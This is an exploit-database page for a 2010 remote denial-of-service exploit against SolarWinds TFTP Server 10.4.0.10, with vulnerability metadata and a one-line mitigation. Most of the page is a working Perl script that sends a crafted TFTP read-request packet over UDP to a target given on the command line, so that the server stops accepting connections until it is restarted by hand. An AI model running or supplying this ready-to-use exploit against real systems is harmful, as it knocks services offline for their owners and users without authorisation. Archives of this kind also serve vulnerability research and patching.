Solarwinds TFTP DOS

vendor:

TFTP Server

by:

Nullthreat

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: TFTP Server

Affected Version From: 10.4.0.10

Affected Version To: 10.4.0.10

Patch Exists: YES

Related CWE: N/A

CPE: a:solarwinds:tftp_server:10.4.0.10

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit by Nullthreat. The application will not crash, but it will stop accepting connections. A malicious user can send a specially crafted packet with an opcode of 1 (Read Request) and a single byte of 0x01 to the server, which will cause the server to stop accepting connections.

Mitigation:

Restrict access to the TFTP server to trusted hosts and networks.

Source

Exploit-DB raw data:

# Exploit Title: Solarwinds TFTP DOS
# Date: 5-21-2010
# Author: Nullthreat
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx
# Version: 10.4.0.10
# Tested on: Windows XP SP3
# Code : 

#!/usr/bin/perl
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit
# by Nullthreat
# The application will not crash, but it will stop accepting connections.
# You will be forced to restart the server by hand in the config
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k

use IO::Socket;
$port = "69";
$host = $ARGV[0];
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');

$really=
"\x00\x01". # Opcode 1 = Read Request
"\x01". # The crash....no really thats it
"\x00". # Null byte
"NETASCII". # The mode
"\x00"; # Null byte
$s->send($really);